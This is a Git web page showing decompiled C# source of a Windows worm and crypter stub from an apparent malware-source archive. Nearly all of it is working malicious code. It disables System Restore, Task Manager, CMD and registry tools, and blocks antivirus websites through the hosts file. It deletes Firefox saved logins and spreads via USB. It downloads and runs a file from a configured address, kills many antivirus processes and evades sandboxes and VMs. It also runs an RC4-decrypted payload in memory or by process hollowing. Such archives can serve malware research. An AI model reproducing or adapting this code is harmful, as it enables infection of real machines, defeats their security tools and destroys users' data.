ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Form1.cs

833 lines
26 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.Form1
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using BCV5StuB.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace BCV5StuB
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("WebBrowser1")]
private WebBrowser _WebBrowser1;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("CheckBox1")]
private CheckBox _CheckBox1;
private string TPath;
private string filetoinject;
private const string FileFucker = "Blackout";
private string filetodo;
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.TPath = Path.GetTempPath();
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.Label1 = new Label();
this.WebBrowser1 = new WebBrowser();
this.Button1 = new Button();
this.CheckBox1 = new CheckBox();
this.SuspendLayout();
this.Label1.AutoSize = true;
Label label1_1 = this.Label1;
Point point1 = new Point(102, 62);
Point point2 = point1;
label1_1.Location = point2;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
Size size1 = new Size(39, 13);
Size size2 = size1;
label1_2.Size = size2;
this.Label1.TabIndex = 0;
this.Label1.Text = "Label1";
WebBrowser webBrowser1_1 = this.WebBrowser1;
point1 = new Point(169, 62);
Point point3 = point1;
webBrowser1_1.Location = point3;
WebBrowser webBrowser1_2 = this.WebBrowser1;
size1 = new Size(20, 20);
Size size3 = size1;
webBrowser1_2.MinimumSize = size3;
this.WebBrowser1.Name = "WebBrowser1";
WebBrowser webBrowser1_3 = this.WebBrowser1;
size1 = new Size(176, 162);
Size size4 = size1;
webBrowser1_3.Size = size4;
this.WebBrowser1.TabIndex = 1;
Button button1_1 = this.Button1;
point1 = new Point(199, 13);
Point point4 = point1;
button1_1.Location = point4;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(75, 23);
Size size5 = size1;
button1_2.Size = size5;
this.Button1.TabIndex = 2;
this.Button1.Text = "Button1";
this.Button1.UseVisualStyleBackColor = true;
this.CheckBox1.AutoSize = true;
CheckBox checkBox1_1 = this.CheckBox1;
point1 = new Point(49, 139);
Point point5 = point1;
checkBox1_1.Location = point5;
this.CheckBox1.Name = "CheckBox1";
CheckBox checkBox1_2 = this.CheckBox1;
size1 = new Size(81, 17);
Size size6 = size1;
checkBox1_2.Size = size6;
this.CheckBox1.TabIndex = 3;
this.CheckBox1.Text = "CheckBox1";
this.CheckBox1.UseVisualStyleBackColor = true;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(409, 248);
this.ClientSize = size1;
this.Controls.Add((Control) this.CheckBox1);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.WebBrowser1);
this.Controls.Add((Control) this.Label1);
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this._Label1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual WebBrowser WebBrowser1
{
[DebuggerNonUserCode] get => this._WebBrowser1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._WebBrowser1 = value;
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
}
internal virtual CheckBox CheckBox1
{
[DebuggerNonUserCode] get => this._CheckBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
}
private void Form1_Load(object sender, EventArgs e)
{
this.Visible = false;
this.ShowInTaskbar = false;
bool flag = Form1.is64Bit();
string[] strArray = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "Blackout");
string str1 = strArray[7];
string str2 = strArray[8];
string str3 = strArray[9];
string str4 = strArray[10];
string address = strArray[11];
string str5 = strArray[12];
string str6 = strArray[13];
string str7 = strArray[14];
string str8 = strArray[15];
string str9 = strArray[16];
if (Conversions.ToBoolean(strArray[17]))
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", (object) "1", RegistryValueKind.DWord);
if (Conversions.ToBoolean(str9))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
if (Conversions.ToBoolean(str8))
{
StreamWriter streamWriter = new StreamWriter("C:\\Windows\\System32\\drivers\\etc\\hosts", true);
string str10 = "\n 127.0.0.1 www.virustotal.com";
string str11 = "\n 127.0.0.1 www.bitdefender.com";
string str12 = "\n 127.0.0.1 www.virusscan.jotti.org";
string str13 = "\n 127.0.0.1 www.scanner.novirusthanks.org";
streamWriter.Write(str10);
streamWriter.Write("\r\n" + str11);
streamWriter.Write("\r\n" + str12);
streamWriter.Write("\r\n" + str13);
streamWriter.Close();
}
if (Conversions.ToBoolean(str7))
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
if (Conversions.ToBoolean(str6))
{
string str14 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (Directory.Exists(str14))
{
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str14))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
if (Conversions.ToBoolean(str5))
{
try
{
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
if (Conversions.ToBoolean(str1))
usb.usb_sp();
if (MyProject.Computer.FileSystem.FileExists(this.TPath + "123.exe"))
MyProject.Computer.FileSystem.DeleteFile(this.TPath + "123.exe");
if (Conversions.ToBoolean(str4))
{
MyProject.Computer.Network.DownloadFile(address, this.TPath + "123.exe");
Process.Start(this.TPath + "123.exe");
}
if (Conversions.ToBoolean(str2))
rc4.Startup();
if (Conversions.ToBoolean(str3))
{
Form1.mofo();
Form1.AntiAntiGen();
Form1.AntiAsquared();
Form1.AntiAvast();
Form1.AntiAVG();
Form1.AntiBullGuard();
Form1.AntiClamAV();
Form1.AntiComodo();
Form1.AntiEstNod32();
Form1.AntiEwido();
Form1.AntiFPROT6();
Form1.AntiKaspersky();
Form1.AntiMcAfee();
Form1.AntiNorton();
Form1.AntiOfficeScan();
Form1.AntiOutPost();
Form1.AntiPCCillin();
Form1.AntiServerProtect();
Form1.AntiSpySweeper();
Form1.AntiThreatExpert();
Form1.AntiVirtualPC();
Form1.AntiZoneAlarm();
}
if (Conversions.ToBoolean(strArray[5]))
{
this.filetodo = rc4.rc4(strArray[6], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig_settings.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetodo, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig_settings.exe");
}
if (Conversions.ToBoolean(strArray[2]))
{
int num = (int) Interaction.MsgBox((object) strArray[1]);
}
if (flag)
{
try
{
if (this.ScanForDotNet())
{
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
}
else
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
Encoding.Default.GetBytes(this.filetoinject);
if (this.ScanForDotNet())
{
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
try
{
new RunPE().SRexec(Encoding.Default.GetBytes(this.filetoinject), Process.GetCurrentProcess().MainModule.FileName);
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
try
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
}
}
}
public static bool is64Bit() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0;
public static void AntiSandboxie(Form frmSelect)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
if (!frmSelect.Text.Contains("#"))
goto label_9;
label_2:
num3 = 3;
frmSelect.Close();
ProjectData.EndApp();
goto label_9;
label_4:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 5:
case 6:
goto label_9;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_4;
}
throw ProjectData.CreateProjectError(-2146828237);
label_9:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static void AntiMcAfee()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAVG()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAsquared()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
private void RunFromMemory(byte[] bytes)
{
Assembly assembly = Assembly.Load(bytes);
MethodInfo entryPoint = assembly.EntryPoint;
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
{
(object) new string[1]{ "1" }
});
}
public void runit(string split)
{
byte[] bytes = Encoding.GetEncoding(1252).GetBytes(split);
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.RunFromMemory((byte[]) a0)));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) bytes);
this.Close();
}
private bool ScanForDotNet()
{
if (!this.filetoinject.Contains("</assembly>"))
return false;
bool flag;
return Operators.CompareString(Strings.Split(this.filetoinject, "</assembly>")[1].ToLower(), "", false) != 0 || flag;
}
public static void AntiAvast()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiClamAV()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiComodo()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiEwido()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiFPROT6()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiKaspersky()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiBullGuard()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiZoneAlarm()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAntiGen()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiNorton()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiOfficeScan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiPCCillin()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiServerProtect()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiSpySweeper()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiVirtualPC()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiOutPost()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiEstNod32()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
public static void mofo()
{
Form1.seekit("MSASCui");
Form1.seekit("msmpeng");
Form1.AntiSandboxie();
Form1.IsVmWare();
Form1.AntiThreatExpert();
Form1.checkUsername();
Form1.checkComputername();
}
private static void seekit(string gay1)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(gay1))
{
try
{
process.Kill();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
private static void checkUsername()
{
List<string> stringList = new List<string>();
stringList.Add("UserName");
stringList.Add("User");
stringList.Add("honey");
stringList.Add("sandbox");
stringList.Add("currentuser");
stringList.Add("User");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.UserName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
private static void checkComputername()
{
List<string> stringList = new List<string>();
stringList.Add("ComputerName");
stringList.Add("COMPUTERNAME");
stringList.Add("DELL-D3E62F7E26");
stringList.Add("DWI-9625AC2E275");
stringList.Add("MICHAEL-F156CF7");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.MachineName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
public static void AntiSandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
public static void IsVmWare()
{
string str1 = "VMDragDetectWndClass";
ref string local1 = ref str1;
string str2 = (string) null;
ref string local2 = ref str2;
if (Form1.FindWindow(ref local1, ref local2) != 0L)
return;
Environment.Exit(0);
}
private static void AntiThreatExpert()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
}
}
Reference in New Issue Copy Permalink